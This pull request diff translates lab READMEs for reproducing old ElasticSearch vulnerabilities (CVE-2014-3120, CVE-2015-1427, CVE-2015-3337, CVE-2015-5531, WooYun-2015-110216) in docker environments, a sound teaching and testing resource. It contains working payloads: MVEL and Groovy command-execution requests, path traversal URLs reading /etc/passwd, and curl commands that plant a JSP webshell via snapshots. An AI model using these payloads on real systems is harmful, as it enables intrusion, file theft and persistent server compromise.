### PR TITLE
Translate ElasticSearch documentation

### DIFF
--- a/elasticsearch/CVE-2014-3120/README.zh-cn.md
+++ b/elasticsearch/CVE-2014-3120/README.zh-cn.md
@@ -1,36 +1,32 @@
-# ElasticSearch Remote Code Execution (CVE-2014-3120)
+# ElasticSearch 远程代码执行漏洞（CVE-2014-3120）
 
-[中文版本(Chinese version)](README.zh-cn.md)
+ElasticSearch 是一个分布式的RESTful搜索和分析引擎。
 
-ElasticSearch is a distributed, RESTful search and analytics engine.
-
-The default configuration in Elasticsearch before 1.2 enables dynamic scripting, which allows remote attackers to execute arbitrary MVEL expressions and Java code via the source parameter to `_search`.
-
-Here's an example of MVEL code that executes system commands:
+ElasticSearch 1.2版本之前默认启用了动态脚本功能，攻击者可以通过`_search`请求的`source`参数执行任意MVEL表达式和Java代码。MVEL是一种基于Java的动态脚本语言，下面是一个使用MVEL执行系统命令的示例代码：
 
 ```java
 import java.io.*;
 new java.util.Scanner(Runtime.getRuntime().exec("id").getInputStream()).useDelimiter("\\A").next();
 ```
 
-References:
+参考链接：
 
 - <https://bou.ke/blog/elasticsearch-rce/>
 - <https://www.exploit-db.com/exploits/33370>
 
-## Vulnerability Reproduction
+## 漏洞复现
 
-Execute the following commands to start a vulnerable ElasticSearch server 1.1.1:
+执行以下命令启动一个1.1.1版本的ElasticSearch服务器：
 
 ```
 docker compose up -d
 ```
 
-After the server starts, you can access the ElasticSearch API at `http://your-ip:9200`.
+环境启动后，可以通过`http://your-ip:9200`访问ElasticSearch API。
 
-## Exploitation
+## 漏洞复现
 
-The exploit requires at least one document in the index. First, create a document:
+此漏洞利用需要索引中至少存在一个文档。首先，创建一个文档：
 
 ```
 POST /website/blog/ HTTP/1.1
@@ -47,7 +43,7 @@ Content-Length: 25
 }
 ```
 
-Then, send a request containing the malicious MVEL script to execute arbitrary commands:
+然后，发送包含恶意MVEL脚本的请求来执行任意命令：
 
 ```
 POST /_search?pretty HTTP/1.1
@@ -77,6 +73,6 @@ Content-Length: 343
 }
 ```
 
-The command execution result will be returned in the response:
+命令执行结果将在响应中返回：
 
 ![](1.png)

--- a/elasticsearch/CVE-2014-3120/README.zh-cn.md
+++ b/elasticsearch/CVE-2014-3120/README.zh-cn.md
@@ -14,7 +14,7 @@ new java.util.Scanner(Runtime.getRuntime().exec("id").getInputStream()).useDelim
 - <https://bou.ke/blog/elasticsearch-rce/>
 - <https://www.exploit-db.com/exploits/33370>
 
-## 漏洞复现
+## 漏洞环境
 
 执行以下命令启动一个1.1.1版本的ElasticSearch服务器：
 

--- a/elasticsearch/CVE-2014-3120/docker-compose.yml
+++ b/elasticsearch/CVE-2014-3120/docker-compose.yml
@@ -1,4 +1,3 @@
-version: '2'
 services:
  es:
    image: vulhub/elasticsearch:1.1.1

--- a/elasticsearch/CVE-2015-1427/README.md
+++ b/elasticsearch/CVE-2015-1427/README.md
@@ -1,51 +1,51 @@
-# ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞（CVE-2015-1427）测试环境
+# ElasticSearch Groovy Sandbox Bypass and Remote Code Execution (CVE-2015-1427)
 
-jre版本：openjdk:8-jre
+[中文版本(Chinese version)](README.zh-cn.md)
 
-elasticsearch版本：v1.4.2
+ElasticSearch is a distributed, RESTful search and analytics engine.
 
-## 原理
+ElasticSearch versions prior to 1.3.8 and 1.4.3 contain a vulnerability in the Groovy scripting engine that allows attackers to bypass the sandbox protection and execute arbitrary code on the server.
 
-参考文章：
+After [CVE-2014-3120](../CVE-2014-3120/), ElasticSearch changed its default dynamic scripting language to Groovy and added a sandbox. However, dynamic language execution remained enabled by default. This vulnerability involves:
 
-- http://cb.drops.wiki/drops/papers-5107.html
-- http://jordan-wright.com/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/
-- https://github.com/XiphosResearch/exploits
-- http://cb.drops.wiki/drops/papers-5142.html
+1. A sandbox bypass
+2. A Groovy code execution vulnerability
 
-CVE-2014-3120后，ElasticSearch默认的动态脚本语言换成了Groovy，并增加了沙盒，但默认仍然支持直接执行动态语言。本漏洞：1.是一个沙盒绕过； 2.是一个Goovy代码执行漏洞。
+ElasticSearch supports using "sandboxed" Groovy language as a dynamic scripting engine. However, the sandbox implementation was insufficient. Two methods for command execution were discovered:
 
-## Groovy语言“沙盒”
+1. Lupin's method: Bypass the Java sandbox using reflection
+2. Tang3's method: Use Groovy language features to execute commands directly, without using Java
 
-ElasticSearch支持使用“在沙盒中的”Groovy语言作为动态脚本，但显然官方的工作并没有做好。lupin和tang3分别提出了两种执行命令的方法：
+Based on these approaches, we have two different POCs.
 
-1. 既然对执行Java代码有沙盒，lupin的方法是想办法绕过沙盒，比如使用Java反射
-2. Groovy原本也是一门语言，于是tang3另辟蹊径，使用Groovy语言支持的方法，来直接执行命令，无需使用Java语言
+Java sandbox bypass method:
 
-所以，根据这两种执行漏洞的思路，我们可以获得两个不同的POC。
-
-Java沙盒绕过法：
-
-```
+```groovy
 java.lang.Math.class.forName("java.lang.Runtime").getRuntime().exec("id").getText()
 ```
 
-Goovy直接执行命令法：
+Groovy direct command execution method:
 
-```
+```groovy
 def command='id';def res=command.execute().text;res
 ```
 
-## 漏洞测试
+References:
 
-编译及运行测试环境
+- <http://jordan-wright.com/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/>
+- <https://github.com/XiphosResearch/exploits>
+- <http://cb.drops.wiki/drops/papers-5107.html>
+- <http://cb.drops.wiki/drops/papers-5142.html>
+
+## Vulnerability Reproduction
+
+Execute the following commands to start a 1.4.2 version ElasticSearch server:
 
 ```
-docker compose build
 docker compose up -d
 ```
 
-由于查询时至少要求es中有一条数据，所以发送如下数据包，增加一个数据：
+Since querying requires at least one document in the index, first send the following request to add data:
 
 ```
 POST /website/blog/ HTTP/1.1
@@ -62,7 +62,7 @@ Content-Length: 25
 }
 ```
 
-然后发送包含payload的数据包，执行任意命令：
+Then send a request containing the payload to execute arbitrary commands:
 
 ```
 POST /_search?pretty HTTP/1.1
@@ -76,5 +76,7 @@ Content-Length: 156
 
 {"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}}
 ```
+
+The command execution result will be returned in the response:
 
 ![](1.png)

--- a/elasticsearch/CVE-2015-1427/README.md
+++ b/elasticsearch/CVE-2015-1427/README.md
@@ -37,13 +37,17 @@ References:
 - <http://cb.drops.wiki/drops/papers-5107.html>
 - <http://cb.drops.wiki/drops/papers-5142.html>
 
-## Vulnerability Reproduction
+## Environment Setup
 
 Execute the following commands to start a 1.4.2 version ElasticSearch server:
 
 ```
 docker compose up -d
 ```
+
+After the server starts, you can access the ElasticSearch server at `http://your-ip:9200`.
+
+## Vulnerability Reproduction
 
 Since querying requires at least one document in the index, first send the following request to add data:
 

--- a/elasticsearch/CVE-2015-1427/README.zh-cn.md
+++ b/elasticsearch/CVE-2015-1427/README.zh-cn.md
@@ -1,0 +1,79 @@
+# ElasticSearch Groovy 沙盒绕过与远程代码执行漏洞（CVE-2015-1427）
+
+ElasticSearch是一个分布式的RESTful搜索和分析引擎。
+
+在ElasticSearch 1.3.8和1.4.3之前的版本中，Groovy脚本引擎存在一个漏洞，攻击者可以绕过沙盒保护并在服务器上执行任意代码。
+
+在修复[CVE-2014-3120](../CVE-2014-3120/)漏洞后，ElasticSearch将默认的动态脚本语言更改为Groovy，并增加了沙盒保护。但是，动态语言执行功能仍然默认启用。本漏洞包含两个方面：
+
+1. 沙盒绕过
+2. Groovy代码执行漏洞
+
+ElasticSearch支持使用"沙盒化"的Groovy语言作为动态脚本引擎。然而，沙盒的实现并不完善。研究人员发现了两种执行命令的方法：
+
+1. Lupin的方法：使用Java反射绕过沙盒
+2. Tang3的方法：直接使用Groovy语言特性执行命令，无需使用Java
+
+基于这两种方法，我们有两个不同的POC。
+
+Java沙盒绕过方法：
+
+```groovy
+java.lang.Math.class.forName("java.lang.Runtime").getRuntime().exec("id").getText()
+```
+
+Groovy直接命令执行方法：
+
+```groovy
+def command='id';def res=command.execute().text;res
+```
+
+参考链接：
+- <http://jordan-wright.com/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/>
+- <https://github.com/XiphosResearch/exploits>
+- <http://cb.drops.wiki/drops/papers-5107.html>
+- <http://cb.drops.wiki/drops/papers-5142.html>
+
+## 漏洞复现
+
+执行以下命令启动一个1.4.2版本的ElasticSearch服务器：
+
+```
+docker compose up -d
+```
+
+由于查询时需要索引中至少有一条数据，首先发送以下请求添加数据：
+
+```
+POST /website/blog/ HTTP/1.1
+Host: your-ip:9200
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 25
+
+{
+  "name": "test"
+}
+```
+
+然后发送包含payload的请求来执行任意命令：
+
+```
+POST /_search?pretty HTTP/1.1
+Host: your-ip:9200
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Type: application/text
+Content-Length: 156
+
+{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}}
+```
+
+命令执行结果将在响应中返回：
+
+![](1.png)

--- a/elasticsearch/CVE-2015-1427/README.zh-cn.md
+++ b/elasticsearch/CVE-2015-1427/README.zh-cn.md
@@ -29,18 +29,23 @@ def command='id';def res=command.execute().text;res
 ```
 
 参考链接：
+
 - <http://jordan-wright.com/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/>
 - <https://github.com/XiphosResearch/exploits>
 - <http://cb.drops.wiki/drops/papers-5107.html>
 - <http://cb.drops.wiki/drops/papers-5142.html>
 
-## 漏洞复现
+## 漏洞环境
 
 执行以下命令启动一个1.4.2版本的ElasticSearch服务器：
 
 ```
 docker compose up -d
 ```
+
+环境启动后，可以通过`http://your-ip:9200`访问ElasticSearch API。
+
+## 漏洞复现
 
 由于查询时需要索引中至少有一条数据，首先发送以下请求添加数据：
 

--- a/elasticsearch/CVE-2015-1427/docker-compose.yml
+++ b/elasticsearch/CVE-2015-1427/docker-compose.yml
@@ -1,4 +1,3 @@
-version: '2'
 services:
  es:
    image: vulhub/elasticsearch:1.4.2

--- a/elasticsearch/CVE-2015-3337/README.md
+++ b/elasticsearch/CVE-2015-3337/README.md
@@ -1,30 +1,43 @@
-# ElasticSearch 目录穿越漏洞（CVE-2015-3337）测试环境
+# ElasticSearch Plug-in Directory Traversal (CVE-2015-3337)
 
-jre版本：openjdk:8-jre
+[中文版本(Chinese version)](README.zh-cn.md)
 
-elasticsearch版本：v1.4.4
+ElasticSearch is a distributed, RESTful search and analytics engine.
 
-影响版本：1.4.5以下/1.5.2以下
+In the ElasticSearch versions before 1.4.5 and 1.5.x before 1.5.2, a directory traversal vulnerability exists in ElasticSearch's plugin functionality that allows attackers to read arbitrary files on the system.
 
-## 原理
+References:
 
-在安装了具有“site”功能的插件以后，插件目录使用`../`即可向上跳转，导致目录穿越漏洞，可读取任意文件。没有安装任意插件的elasticsearch不受影响。
+- <https://nvd.nist.gov/vuln/detail/CVE-2015-3337>
+- <https://github.com/elastic/elasticsearch/issues/10828>
 
-## 测试环境
+## Vulnerability Description
 
-编译及运行测试环境
+After installing a plugin with "site" functionality, an attacker can use `../` in the plugin directory path to traverse up the directory tree, leading to arbitrary file read. ElasticSearch installations without any plugins are not affected.
+
+## Environment Setup
+
+Execute the following commands to build and start an ElasticSearch server 1.4.4:
 
 ```
 docker compose build
 docker compose up -d
 ```
 
-测试环境默认安装了一个插件：`elasticsearch-head`，主页在此：https://github.com/mobz/elasticsearch-head
+The test environment comes with a pre-installed plugin: `elasticsearch-head`, which is a web front-end for ElasticSearch. More information about this plugin can be found at: <https://github.com/mobz/elasticsearch-head>
 
-访问`http://your-ip:9200/_plugin/head/../../../../../../../../../etc/passwd`读取任意文件（不要在浏览器访问）：
+## Vulnerability Reproduction
+
+To exploit this vulnerability, send a request to read arbitrary files using directory traversal in the plugin path. For example, to read `/etc/passwd`, send a request to:
+
+```
+http://your-ip:9200/_plugin/head/../../../../../../../../../etc/passwd
+```
+
+Note: Do not access this URL directly in a browser.
 
 ![](1.png)
 
-## head插件
+## Additional Information
 
-head插件提供了elasticsearch的前端页面，访问 `http://your-ip:9200/_plugin/head/` 即可看到，不多说了。
+The head plugin provides a web interface for ElasticSearch. You can access it at `http://your-ip:9200/_plugin/head/` to interact with your ElasticSearch cluster through a graphical interface.

--- a/elasticsearch/CVE-2015-3337/README.zh-cn.md
+++ b/elasticsearch/CVE-2015-3337/README.zh-cn.md
@@ -1,0 +1,36 @@
+# ElasticSearch 插件目录穿越漏洞（CVE-2015-3337）
+
+ElasticSearch是一个分布式的RESTful搜索和分析引擎。
+
+在ElasticSearch的插件功能中存在一个目录穿越漏洞，攻击者可以利用该漏洞读取系统上的任意文件。在安装了具有"site"功能的插件后，攻击者可以通过在插件目录路径中使用`../`来遍历目录树，从而实现任意文件读取。未安装任何插件的ElasticSearch不受此漏洞影响。
+
+参考链接：
+
+- <https://nvd.nist.gov/vuln/detail/CVE-2015-3337>
+- <https://github.com/elastic/elasticsearch/issues/10828>
+
+## 环境搭建
+
+执行以下命令来启动一个1.4.4版本的ElasticSearch服务器：
+
+```
+docker compose up -d
+```
+
+测试环境默认安装了一个插件：`elasticsearch-head`，这是一个ElasticSearch的Web前端界面。关于该插件的更多信息可以在这里找到：<https://github.com/mobz/elasticsearch-head>
+
+## 漏洞复现
+
+要利用此漏洞，可以通过在插件路径中使用目录穿越来读取任意文件。例如，要读取`/etc/passwd`文件，发送如下请求：
+
+```
+http://your-ip:9200/_plugin/head/../../../../../../../../../etc/passwd
+```
+
+注意：请不要直接在浏览器中访问此URL。
+
+![](1.png)
+
+## 补充信息
+
+head插件提供了ElasticSearch的Web界面。你可以通过访问`http://your-ip:9200/_plugin/head/`来通过图形界面与你的ElasticSearch集群进行交互。

--- a/elasticsearch/CVE-2015-3337/docker-compose.yml
+++ b/elasticsearch/CVE-2015-3337/docker-compose.yml
@@ -1,4 +1,3 @@
-version: '2'
 services:
  es:
    build: .

--- a/elasticsearch/CVE-2015-5531/README.md
+++ b/elasticsearch/CVE-2015-5531/README.md
@@ -1,25 +1,32 @@
-# ElasticSearch 目录穿越漏洞（CVE-2015-5531）
+# ElasticSearch Snapshot and Restore Directory Traversal (CVE-2015-5531)
 
-jre版本：openjdk:8-jre
+[中文版本(Chinese version)](README.zh-cn.md)
 
-elasticsearch版本：v1.6.0
+ElasticSearch is a distributed, RESTful search and analytics engine.
 
-影响版本：1.6.1以下
+In the ElasticSearch versions before 1.6.1, a directory traversal vulnerability exists in ElasticSearch's snapshot and restore functionality, allowing attackers to read arbitrary files on the system.
 
-## 原理
+The conditions for exploiting this vulnerability vary depending on the specific version of the target: in ElasticSearch 1.5.1 and earlier versions, this vulnerability could be triggered without any configuration; in later versions, the `path.repo` configuration must be set in elasticsearch.yml. This configuration specifies a directory that must be writable and serves as the root location for backup repositories. Without this configuration, the snapshot and restore functionality is disabled by default.
 
-参考文章
+References:
 
-- https://www.exploit-db.com/exploits/38383/
-- http://www.freebuf.com/vuls/99942.html
+- <https://www.exploit-db.com/exploits/38383/>
+- <http://www.freebuf.com/vuls/99942.html>
 
-说明：
+## Environment Setup
 
-elasticsearch 1.5.1及以前，无需任何配置即可触发该漏洞。之后的新版，配置文件elasticsearch.yml中必须存在`path.repo`，该配置值为一个目录，且该目录必须可写，等于限制了备份仓库的根位置。不配置该值，默认不启动这个功能。
+Execute the following commands to build and start an ElasticSearch server 1.6.0:
 
-## 漏洞复现
+```
+docker compose build
+docker compose up -d
+```
 
-### 1. 新建一个仓库
+After the environment starts, you can access the ElasticSearch server at `http://your-ip:9200`.
+
+## Vulnerability Reproduction
+
+### 1. Create a Repository
 
 ```
 PUT /_snapshot/test HTTP/1.1
@@ -41,7 +48,7 @@ Content-Length: 108
 
 ![](1.png)
 
-### 2. 创建一个快照
+### 2. Create a Snapshot
 
 ```
 PUT /_snapshot/test2 HTTP/1.1
@@ -63,12 +70,16 @@ Content-Length: 108
 
 ![](2.png)
 
-### 3. 目录穿越读取任意文件
+### 3. Exploit Directory Traversal to Read Files
 
-访问 `http://your-ip:9200/_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd`
+Send a request to read arbitrary files using directory traversal. For example, to read `/etc/passwd`:
+
+```
+http://your-ip:9200/_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
+```
 
 ![](3.png)
 
-如上图，在错误信息中包含文件内容（编码后），对其进行解码即可获得文件：
+The file content will be included in the error message (encoded). After decoding, you can obtain the file content:
 
 ![](4.png)

--- a/elasticsearch/CVE-2015-5531/README.zh-cn.md
+++ b/elasticsearch/CVE-2015-5531/README.zh-cn.md
@@ -1,0 +1,82 @@
+# ElasticSearch 快照和恢复功能目录穿越漏洞（CVE-2015-5531）
+
+ElasticSearch是一个分布式的RESTful搜索和分析引擎。
+
+在ElasticSearch 1.6.0及更早版本中，存在一个目录穿越漏洞，攻击者可以利用该漏洞读取系统上的任意文件。
+
+根据目标的具体版本，该漏洞的利用条件也存在不同：在ElasticSearch 1.5.1及更早版本中，无需任何配置即可触发该漏洞；在之后的版本中，必须在elasticsearch.yml配置文件中设置`path.repo`参数。此配置指定一个必须可写的目录，作为备份仓库的根位置。如果未配置此参数，快照和恢复功能将默认禁用。
+
+参考链接：
+
+- <https://www.exploit-db.com/exploits/38383/>
+- <http://www.freebuf.com/vuls/99942.html>
+
+## 环境搭建
+
+执行以下命令来启动一个1.6.0版本的ElasticSearch服务器：
+
+```
+docker compose up -d
+```
+
+环境启动后，你可以通过`http://your-ip:9200`访问ElasticSearch服务器。
+
+## 漏洞复现
+
+### 1. 创建仓库
+
+```
+PUT /_snapshot/test HTTP/1.1
+Host: your-ip:9200
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 108
+
+{
+    "type": "fs",
+    "settings": {
+        "location": "/usr/share/elasticsearch/repo/test" 
+    }
+}
+```
+
+![](1.png)
+
+### 2. 创建快照
+
+```
+PUT /_snapshot/test2 HTTP/1.1
+Host: your-ip:9200
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 108
+
+{
+    "type": "fs",
+    "settings": {
+        "location": "/usr/share/elasticsearch/repo/test/snapshot-backdata" 
+    }
+}
+```
+
+![](2.png)
+
+### 3. 利用目录穿越读取文件
+
+发送请求使用目录穿越来读取任意文件。例如，要读取`/etc/passwd`文件：
+
+```
+http://your-ip:9200/_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
+```
+
+![](3.png)
+
+文件内容将包含在错误信息中（经过编码）。解码后即可获得文件内容：
+
+![](4.png)

--- a/elasticsearch/CVE-2015-5531/docker-compose.yml
+++ b/elasticsearch/CVE-2015-5531/docker-compose.yml
@@ -1,4 +1,3 @@
-version: '2'
 services:
  es:
    build: .

--- a/elasticsearch/WooYun-2015-110216/README.zh-cn.md
+++ b/elasticsearch/WooYun-2015-110216/README.zh-cn.md
@@ -1,0 +1,67 @@
+# ElasticSearch 任意文件上传漏洞（WooYun-2015-110216）
+
+ElasticSearch是一个分布式的RESTful搜索和分析引擎。
+
+ElasticSearch的备份功能中存在一个漏洞，攻击者可以利用该漏洞向文件系统写入任意文件，当与其他Web服务结合时，可能导致WebShell上传。
+
+ElasticSearch具有数据备份功能，允许用户指定一个路径来存储备份数据。这个路径和文件名都可以由用户控制。如果系统上同时运行着其他Web服务（如Tomcat、PHP等），攻击者可以利用ElasticSearch的备份功能向Web可访问目录写入WebShell。
+
+与[CVE-2015-5531](../CVE-2015-5531/)类似，该漏洞与备份仓库功能有关。在ElasticSearch 1.5.1版本之后，备份仓库的根路径被限制在`path.repo`配置选项中。如果管理员未配置此选项，备份功能将默认禁用。即使配置了该选项，只有当Web根目录位于配置目录内时，才能写入WebShell。
+
+参考链接：
+
+- <http://cb.drops.wiki/bugs/wooyun-2015-0110216.html>
+
+## 环境搭建
+
+执行以下命令启动一个ElasticSearch 1.5.1版本的服务器，同时，一个Tomcat也运行在同一容器中：
+
+```
+docker compose up -d
+```
+
+Tomcat安装在`/usr/local/tomcat`目录，其Web目录位于`/usr/local/tomcat/webapps`。ElasticSearch安装在`/usr/share/elasticsearch`目录。
+
+## 漏洞复现
+
+我们的目标是利用ElasticSearch在`/usr/local/tomcat/webapps`目录下写入WebShell。
+
+首先，创建一个恶意的索引文档：
+
+```
+curl -XPOST http://127.0.0.1:9200/yz.jsp/yz.jsp/1 -d'
+{"<%new java.io.RandomAccessFile(application.getRealPath(new String(new byte[]{47,116,101,115,116,46,106,115,112})),new String(new byte[]{114,119})).write(request.getParameter(new String(new byte[]{102})).getBytes());%>":"test"}
+'
+```
+
+然后创建一个恶意的仓库。其中`location`的值是我们要写入文件的路径。
+
+> 注意：仓库路径的特点在于它可以写入任何可访问的位置，如果路径不存在会自动创建。这意味着你可以通过文件访问协议创建任意文件夹。这里我们将路径指向Tomcat的Web部署目录，因为Tomcat会自动为该目录下创建的文件夹创建新的应用（如果文件名为wwwroot，创建的应用名称就是wwwroot）。
+
+```
+curl -XPUT 'http://127.0.0.1:9200/_snapshot/yz.jsp' -d '{
+     "type": "fs",
+     "settings": {
+          "location": "/usr/local/tomcat/webapps/wwwroot/",
+          "compress": false
+     }
+}'
+```
+
+验证并创建仓库：
+
+```
+curl -XPUT "http://127.0.0.1:9200/_snapshot/yz.jsp/yz.jsp" -d '{
+     "indices": "yz.jsp",
+     "ignore_unavailable": "true",
+     "include_global_state": false
+}'
+```
+
+完成！
+
+访问`http://127.0.0.1:8080/wwwroot/indices/yz.jsp/snapshot-yz.jsp`即可找到我们上传的WebShell。
+
+这个Shell允许向wwwroot目录下的test.jsp文件写入任意字符串。例如：`http://127.0.0.1:8080/wwwroot/indices/yz.jsp/snapshot-yz.jsp?f=success`。然后访问/wwwroot/test.jsp就能看到"success"：
+
+![](1.png)

--- a/elasticsearch/WooYun-2015-110216/docker-compose.yml
+++ b/elasticsearch/WooYun-2015-110216/docker-compose.yml
@@ -1,4 +1,3 @@
-version: '2'
 services:
  es:
    image: vulhub/elasticsearch:1.5.1-with-tomcat

--- a/environments.toml
+++ b/environments.toml
@@ -353,7 +353,7 @@ app = "ElasticSearch"
 path = "elasticsearch/CVE-2015-5531"
 
 [[environment]]
-name = "Elasticsearch Webshell"
+name = "ElasticSearch Arbitrary File Upload"
 cve = []
 app = "ElasticSearch"
 path = "elasticsearch/WooYun-2015-110216"

--- a/environments.toml
+++ b/environments.toml
@@ -347,7 +347,7 @@ app = "ElasticSearch"
 path = "elasticsearch/CVE-2015-3337"
 
 [[environment]]
-name = "ElasticSearch Directory Traversal"
+name = "ElasticSearch Snapshot and Restore Directory Traversal"
 cve = ["CVE-2015-5531"]
 app = "ElasticSearch"
 path = "elasticsearch/CVE-2015-5531"

--- a/environments.toml
+++ b/environments.toml
@@ -335,7 +335,7 @@ app = "ElasticSearch"
 path = "elasticsearch/CVE-2014-3120"
 
 [[environment]]
-name = "ElasticSearch Groovy Sandbox Bypass/Code Execution"
+name = "ElasticSearch Groovy Sandbox Bypass and Remote Code Execution"
 cve = ["CVE-2015-1427"]
 app = "ElasticSearch"
 path = "elasticsearch/CVE-2015-1427"

--- a/environments.toml
+++ b/environments.toml
@@ -329,7 +329,7 @@ app = "ECshop"
 path = "ecshop/xianzhi-2017-02-82239600"
 
 [[environment]]
-name = "ElasticSearch Command Execution"
+name = "ElasticSearch Remote Code Execution"
 cve = ["CVE-2014-3120"]
 app = "ElasticSearch"
 path = "elasticsearch/CVE-2014-3120"


### PR DESCRIPTION
- Rename environment in environments.toml to clarify Remote Code Execution
- Remove Docker Compose version specification
- Translate README to English
- Add Chinese version README (README.zh-cn.md)
- Enhance documentation with detailed technical explanation, references, and exploitation techniques